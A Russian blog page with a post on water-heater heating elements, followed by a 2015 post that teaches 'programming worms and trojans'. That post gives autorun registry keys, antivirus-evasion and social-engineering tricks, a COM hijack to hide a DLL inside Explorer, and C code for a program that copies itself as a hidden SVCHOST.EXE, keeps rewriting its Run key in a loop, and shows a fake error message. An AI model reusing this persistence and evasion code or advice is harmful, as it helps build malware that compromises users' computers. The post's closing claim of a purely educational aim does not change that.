Термоэлектронагреватель (тэн) — это нагревательный элемент, его мощность определяет, насколько быстро будет нагреваться вода в баке.

Тэны бывают двух видов.

Виды нагревательных элементов

- Трубочный нагревательный элемент. Этот вид тэнов является наиболее распространенным, сюда входят и тэны для водонагревателя с терморегулятором. Такой тэн имеет вид металлической трубки (она может иметь любую форму), внутри которой находится проводник с высоким электрическим сопротивлением (за счет него осуществляется нагрев трубки, которая в свою очередь передает тепло воде). Изоляция обеспечивается с помощью диэлектрического песка, которым заполнено пространство между стенкой металлической трубки и проводником. Основной проблемой при эксплуатации таких тэнов является накипь, из-за которой значительно уменьшается теплопередача.

Достоинствами такой конструкции являются меньшее количество потерь тепла из-за накипи и большая электробезопасность.

- Сухой нагревательный элемент. Он отличается от описанного выше тем, что помещен в специальную колбу для защиты. Пространство в колбе заполняет либо кварцевый песок, либо специальное масло. Таким образом, получается, что конструкция представляет собой тэн из керамики.

Как выбрать термоэлектронагреватель (тэн)

Тен для водонагревателя с терморегулятором очень удобен для использования в быту, например, дома или на даче, для подогрева воды в различных емкостях. Терморегулятор позволит контролировать температуру, до которой нагревается вода.

При покупке тэна нужно обратить внимание на следующие моменты:

  • Для чего именно предназначен водонагреватель;
  • Питающее напряжение;
  • Потребляемая мощность;
  • Какая температура воды требуется;
  • Условия теплообмена;
  • Характер нагрева;
  • Вид терморегулятора (обычный или с термозащитой).
Рубрики:  Практические рекомендации
Расширяя кругозор

Метки:  

Куда чаще всего прячутся вирусы

Понедельник, 17 Августа 2015 г. 21:23 + в цитатник

Привет всем. В этой статье я поведаю вам приемы для программирования червей и троянов. Чтобы быть подкованным и без помощи антивирусы расправиться с любым вирусом, Вам стоит это прочесть.
Долго распинаться не буду, и перейду сразу к делу:

Для начала приведу список мест в реестре, где они могут поселиться на автозагрузку.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunOnce\Setup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\ CurrentVersion\Winlogon\Userinit
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\RunOnce\Setup
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\ CurrentVersion\Windows\load

Некоторые из таких мест весьма интересны, потому что на них не обращает внимания msconfig и утилиты для реестра.
Так что вирусы смело записываются туда на автозагрузку.

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer\Run

При написании вирусов используются различные приемы для сокрытия программ от глаз пользователя:

  1. Можно произвольно выбирать имена - прописывать себя с ними в автозагрузку и копировать в винду. Имена можно выбирать как из списка, так и случайно.
  2. Можно при каждой перезагрузке менять местоположение — перемещаясь по системным каталогам и меняя имя.
  3. Также можно хранить в коде своей программы такую же программу, но с другого компилятора. Чтоб Касперкси сразу все не припалил.
  4. При заражении диска или компьютера необходимо учитывать психологию пользователя. Отвлечь его приманить именем программы, иконкой. Вывести липовое системное сообщение.
  5. Работая с окнами можно закрывать авнтивирусы.
  6. При копировании в память нельзя выделять себе большой приоритет.
  7. Из системного реестра можно извлечь много полезной информации. (Ниже приведу интересные параметры реестра).
  8. Отредактировав файл hosts можно без труда запретить пользователю посещать какие-либо домены. Он даже ничего не заподозрит.
  9. Некоторые вирусы хранят в себе коды вирусов на различных языках программирования и в нужный момент извлекают и запускают их.

[HKCR\CLSID\ {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32]
"Apartment" = "%SysDir%\ctfmon.dll"

Таким образом, данная DLL будет запускаться как дочерний процесс Explorer.exe и её не будет в менеджере процессов.

Привожу список параметров реестра разрытых вручную, для удобства вы можете покопаться в книжках по реестру и найти там для себя много нового.

Имена и типы протоколов по умолчанию.

Некоторые вирусы заменяют Стартовую страницу броузеров или поисковую систему по умолчанию.

[HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\CurrentVersion\URL\DefaultPrefix]
@="http://"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\URL\Prefixes]
"ftp"="ftp://"
"gopher"="gopher://"
"home"="http://"
"mosaic"="http://"
"www"="http://"

HKEY_CURRENT_USER\Software\ Microsoft\ Internet Explorer\Main
Start Page
Search Page

Изменяют параметры рабочего стола.

HKEY_CURRENT_USER\Control Panel\Desktop
ConvertedWallpaper
scrnsave.exe
Wallpaper
OriginalWallpaper

Тут хранятся имена и названия системных пользовательских папок, типа: Мои документы, Мои рисунки, Рабочий стол. Их некоторые вирусы могут менять.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Shell Folders
Common Administrative Tools
Common AppData
Common Desktop
Common Documents
Common Favorites
Common Programs
Common Start Menu
Common Startup
Common Templates
CommonMusic
CommonPictures
CommonVideo
Personal

Подменяют информацию о процессоре

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\ System\CentralProcessor\0
ProcessorNameString
~MHz

Здесь хранятся системные цвета (окон, текста, кнопок и, т, д)

HKEY_CURRENT_USER\Control Panel\Colors
ActiveBorder
ActiveTitle
AppWorkSpace
Background
ButtonAlternateFace
ButtonDkShadow
ButtonFace
ButtonHilight
ButtonLight
ButtonShadow
ButtonText
GradientActiveTitle
GradientInactiveTitle
GrayText
Hilight
HilightText
HotTrackingColor
InactiveBorder
InactiveTitle
InactiveTitleText
InfoText
InfoWindow
Menu
MenuBar
MenuHilight
MenuText
Scrollbar
TitleText
Window
WindowFrame
WindowText

Как они добавляют ключи в реестр. Эта WinAPI функция добавления параметров в системный реестр (Работает под любой Windows.)

//------
char windir[512];
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE , "Software\\ Microsoft\\Windows\\CurrentVersion\\ Run",0,KEY_WRITE,&hKey); //Открываем
RegSetValueEx(hKey,"FILE.EXE",0,REG_SZ,(BYTE *) windir,256); //Пишем
RegCloseKey(hKey); //Закрываем
//------

В менеджере процессов постоянно запущены файлы SVCHOST.EXE.
Так вот этот файл лежит в windows\system32\ и вирус сохраняет свое тело под её именем. Поймать такого черта, можно только увидев в менеджере процессов, кто запустил процесс. Все процессы SVCHOST запускаются от имени системы (SYSTEM). Если такой файл запущен от имени пользователя, стоит задуматься.

Вот обрывок того самого кода:

char myname[1024],windir[1024];
HKEY hKey;

SetErrorMode(SEM_NOGPFAULTERRORBOX); //Вырубаем сообщения об ошибках
PeekMessage(NULL, NULL, NULL, NULL, NULL);

GetModuleFileName(hInstance,myname,sizeof(myname)); //Получаем путь к себе и папку винды
GetWindowsDirectory(windir,sizeof(windir));

strcat(windir,"\\SVCHOST.EXE");
CopyFile(myname,windir,FALSE); //Копируемся
SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN);

//--------------------Startup--------------------------------
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft \\Windows\\CurrentVersion\\Run" ,0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,"SVCHOST.EXE",0,REG_SZ,(BYTE *) windir,256); //Пишемся в реестр
RegCloseKey(hKey);
//-----------------------------------------------------------

if(strcmp(windir,myname)) //Проверяем если программа не в папке windows то выйти (Мы ведь уже скопировались ;)!
{
MessageBox(0,"Необходимый файл динамической библиотеки msbjk.dll не найден.","Error", MB_OK | MB_DEFBUTTON1 | MB_ICONEXCLAMATION | MB_DEFAULT_DESKTOP_ONLY);
return 0;
}
//-------
for(;;) //Это бесконечный цикл
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft \\Windows\\CurrentVersion\\Run" , 0,KEY_WRITE,&hKey);
RegSetValueEx(hKey, "SVCHOST.EXE",0, REG_SZ,(BYTE *)windir,256);
RegCloseKey(hKey);
// Тут может быть любой код вашей программы
EnumProcessesOther();// Эта функция будет описана в следующ
ей статье (Она закрывт все антивирусы)
Sleep(30000); //Задержка на 30 секунд
}

В папке windows есть файл без расширения hosts. Если в него вписать код:

0.0.0.0 www.site.com

0.0.0.0 www.microsoft.com

То пользователь не сможет зайти ни на один из этих сайтов, каким бы браузером и через какие прокси он бы не старался. Так что иногда туда заглядывайте.

Сорри, но полностью все и изложить не смог, так как это уже будет не статья, а книжка ;)

Статья написана исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Рубрики:  Программное обеспечение

Метки:  

Поиск сообщений в chooser
Страницы: 25 24 23 [22] 21 20 ..
.. 1 Календарь